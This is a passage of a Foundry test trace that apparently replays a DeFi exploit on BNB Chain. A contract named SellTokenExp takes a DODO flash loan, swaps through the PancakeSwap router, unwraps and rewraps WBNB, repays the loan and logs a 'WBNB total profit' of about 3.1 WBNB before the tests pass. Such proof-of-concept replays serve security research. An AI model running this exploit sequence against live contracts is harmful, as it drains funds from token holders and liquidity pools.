    │   │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 381017754148712581746638 [3.81e23], amount1In: 0, amount0Out: 0, amount1Out: 15334229087419300293 [1.533e19], to: 0x10ED43C718714eb63d5aA57B78B54704E256024E)
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 8: 0x645f38b1000000000016efaa95d33be40919000000085c27be7ba5a6d9d61d3a → 0x645f38b10000000000161adc75b6dfcd0f5400000008acd6c206ad5374daed08
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x10ED43C718714eb63d5aA57B78B54704E256024E) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 15334229087419300293 [1.533e19]
    │   │   │   │   │   ├─ [9223] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::withdraw(15334229087419300293 [1.533e19])
    │   │   │   │   │   │   ├─ [83] 0x10ED43C718714eb63d5aA57B78B54704E256024E::fallback{value: 15334229087419300293}()
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ emit Withdrawal(src: 0x10ED43C718714eb63d5aA57B78B54704E256024E, wad: 15334229087419300293 [1.533e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x000000000000000000000000000000000000000000000000d4ce201c5c16f9c5 → 0
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [55] SellTokenExp::receive{value: 15334229087419300293}()
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [1234] 0x8D190C70937493046a464440d28f126A4E42eF7f::e61c18d0(000000000000000000000000a645995e9801f2ca6e2361edf4c2a138362bade40000000000000000000000000000000000000000000050af038b07ac9b04cfce0000000000000000000000000000000000000000000000000000000000000000)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2b935c4b73d8bbe2cf89a1a274a236c63ef4392dbb5a85e1319c08e366846d95: 0x0000000000000000000000000000000000000000000d2fcf809d23c0b3ddbad4 → 0x0000000000000000000000000000000000000000000cdf207d121c1418d8eb06
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x5c0953d51df0384d146b9109d3b644acbdae290c87b9a8d33ec38895c4c24c73: 0x000000000000000000000000000000000000000000000546c7e7ec1fe0ba8ca2 → 0
    │   │   │   │   @ 0x2b935c4b73d8bbe2cf89a1a274a236c63ef4392dbb5a85e1319c08e366846d95: 0x0000000000000000000000000000000000000000000d2fcf809d23c0b3ddbad4 → 0x0000000000000000000000000000000000000000000cdf207d121c1418d8eb06
    │   │   │   │   @ 0x5c0953d51df0384d146b9109d3b644acbdae290c87b9a8d33ec38895c4c24c72: 0x0000000000000000000000000000000000000000000000003a22e37ca72b0de9 → 0
    │   │   │   │   @ 0x5c0953d51df0384d146b9109d3b644acbdae290c87b9a8d33ec38895c4c24c71: 0x000000000000000000000000a645995e9801f2ca6e2361edf4c2a138362bade4 → 0
    │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 1 → 0
    │   │   │   │   @ 0x838cb7bb5c06a66a21dd595cea33e8ec0de8d570a416ba58ef38933b5ca66187: 0x000000000000000000000000a645995e9801f2ca6e2361edf4c2a138362bade4 → 0
    │   │   │   │   @ 0x5c0953d51df0384d146b9109d3b644acbdae290c87b9a8d33ec38895c4c24c74: 0x00000000000000000000000000000000000000000000000000000000645f38b1 → 0
    │   │   │   │   @ 3: 0x000000000000000000000000000000000000000000000011f4ba80707e21340a → 0x0000000000000000000000000000000000000000000000122edd63ed254c41f3
    │   │   │   └─ ← [Stop]
    │   │   ├─ [2074] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::deposit{value: 15334229087419300293}()
    │   │   │   ├─ emit Deposit(dst: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 15334229087419300293 [1.533e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000170d72875ffc37bdc9 → 0x000000000000000000000000000000000000000000000017e240a77c584eb78e
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681, 427465380400821339663 [4.274e20])
    │   │   │   ├─ emit Transfer(from: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681, value: 427465380400821339663 [4.274e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x95870720a9b5a6420749f02df2d1248f9e2447dd5ed7a5b82d399a1b406f5197: 0 → 0x0000000000000000000000000000000000000000000000172c461aaa782e860f
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000017e240a77c584eb78e → 0x000000000000000000000000000000000000000000000000b5fa8cd1e020317f
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 12: 0 → 1
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000170d72875ffc37bdc9 → 0x000000000000000000000000000000000000000000000017e240a77c584eb78e
    │   │   └─ ← [Stop]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 427465380400821339663 [4.274e20]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 923675098292473509857042 [9.236e23]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 427465380400821339663 [4.274e20]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 923675098292473509857042 [9.236e23]
    │   ├─ emit DODOFlashLoan(: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 418509475390597934136 [4.185e20], : 0)
    │   ├─  storage changes:
    │   │   @ 5: 0x0000000000000000c39887047897e7324712000000000016affc56826facac38 → 0x0000000000000000c39887047897e73247120000000000172c461aaa782e860f
    │   │   @ 0x95870720a9b5a6420749f02df2d1248f9e2447dd5ed7a5b82d399a1b406f5197: 0 → 0x0000000000000000000000000000000000000000000000172c461aaa782e860f
    │   └─ ← [Stop]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 13112948098078880127 [1.311e19]
    ├─ emit log_named_decimal_uint(key: "WBNB total profit", val: 3112948098078880127 [3.112e18], decimals: 18)
    ├─  storage changes:
    │   @ 1: 0x0000000000000000010001010000000000000000000000000000000000000000 → 0x0000000000000000010000010000000000000000000000000000000000000000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 14.23s (12.03s CPU time)

Ran 2 test suites in 15.16s (14.91s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
